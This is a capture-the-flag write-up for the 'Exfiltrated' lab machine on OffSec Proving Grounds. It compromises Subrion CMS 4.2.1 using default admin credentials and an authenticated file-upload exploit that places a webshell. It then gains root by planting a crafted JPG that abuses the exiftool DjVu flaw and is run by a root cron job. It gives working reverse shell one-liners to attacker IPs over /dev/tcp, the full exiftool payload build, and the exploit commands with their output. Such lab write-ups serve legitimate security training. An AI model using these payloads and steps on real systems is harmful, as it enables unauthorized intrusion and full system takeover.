Exfiltrated - OSPG
Summary
In this writeup, we’ll exploit the Subrion v4.2.1 CMS to secure the inital foothold. We’ll then escalate our privilege via a crontab service that executes the exploitable exiftool.
Enumeration
Nmap
We’ll begin with a nmap scan.
$ sudo nmap --open -sV -A -p- -vv -n -Pn $IP -oN nmap/services.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Inspecting the outputs, we hit on a few compelling directories of the HTTP service.
Navigating to each of them, the /panel/ directory redirects us to a new page.
$ curl -s $URL/panel/
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<title>Login :: Powered by Subrion 4.2</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="generator" content="Subrion CMS - Open Source Content Management System">
...
The page is running Subrion v4.2.1 CMS, and we are asked to provide admin credentials.
Exploitation
Subrion Weak Credentials
Let’s us test some default combinations of admin:admin, admin:password, subrion:subrion or root:toor …
Luckily, the first combination (admin:admin) allows us to bypass the login prompt and land on the Admin Dashboard page.
Subrion v4.2.1 File Upload Bypass to RCE
We can further examine the CMS public vulnerabilities with searchsploit.
$ searchsploit Subrion 4.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) | php/webapps/49876.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Now, we can safely assume that the target system might be vulnerable to RCE due to the similar version of Subrion.
Since the admin credentials are compromised, we can continue mouting our attacks by executing the following commands
$ searchsploit -x php/webapps/49876.py # → Copy the exploit script to current directory.
$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin # → execute the copied script given URL, admin username and password.
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: HDUgrsxjx6on2NWuf6kfmKLDxgcfXy7QIDVebkAo
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: tqrdcqpnkrgchnr
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/tqrdcqpnkrgchnr.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.49.122%2F80+0%3E%261%22 # → call URL-encoded reverse shell
The original reverse shell is as the follow:
$ bash -c "bash -i >& /dev/tcp/192.168.49.122/80 0>&1"
After the commands are executed, our nc should catch the connection at port 80 as www-data.
$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.163] 57592
bash: cannot set terminal process group (973): Inappropriate ioctl for device
bash: no job control in this shell
www-data@exfiltrated:/var/www/html/subrion/uploads$
Privilege Escalation
Crontab Service
Local enumeration reveals an interesting entry of a crontab file.
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab
...
* * * * * root bash /opt/image-exif.sh
The shell /opt/image-exif.sh will be executed every one minute by root.
Let’s us take a closer look at its content.
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
Primarily, the script will look for any jpg file in the /var/www/html/subrion/uploads directory and execute exiftool against that file.
Exiftool to RCE
Recently, a Security Researcher spotted a RCE vulnerability in the exiftool < v12.24.
To check the current exiftool version, we execute:
www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver
11.x
The result implies that the current exiftool might be exploitable. We can test our theory by navigating along the PoC:
On the local terminal, we execute
$ sudo apt-get update && sudo apt-get install -y djvulibre-bin # → Install dependencies
$ cat payload # → Create a payload file with the content is a reverse shell.
(metadata "\c${system('bash -c \"bash -i >& /dev/tcp/192.168.49.63/80 0>&1\"')};")
$ bzz payload payload.bzz # → Compress the payload
$ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz # → Compile the exploit.djvu file
$ cat configfile # → Prepare a configfile having the following content.
%Image::ExifTool::UserDefined = (
# All EXIF tags are added to the Main table, and WriteGroup is used to
# specify where the tag is written (default is ExifIFD if not specified):
'Image::ExifTool::Exif::Main' => {
# Example 1. EXIF:NewEXIFTag
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
# add more user-defined EXIF tags here...
},
);
1; #end%
$ exiftool -config configfile '-HasselbladExif<=exploit.djvu' sample.jpg # → Embed the payload into the sample.jpg image
$ python3 -m http.server 80 # → Create a http server to transfer the payload
On the www-data shell, we download the sample.jpg image utilizing wget.
$ www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.49.63/sample.jpg
Connecting to 192.168.49.63:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4405 (4.3K) [image/jpeg]
Saving to: ‘sample.jpg’
sample.jpg 100%[=====================================================================================================================>] 4.30K --.-KB/s in 0.03s
It’s important to save the downloaded sample.jpg file inside/var/www/html/subrion/uploads directory, then wait …
After a minute, we should obtain the reverse shell
$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.63] from (UNKNOWN) [192.168.63.163] 50058
bash: cannot set terminal process group (37008): Inappropriate ioctl for device
bash: no job control in this shell
root@exfiltrated:~# id
id
uid=0(root) gid=0(root) groups=0(root)
and become root!.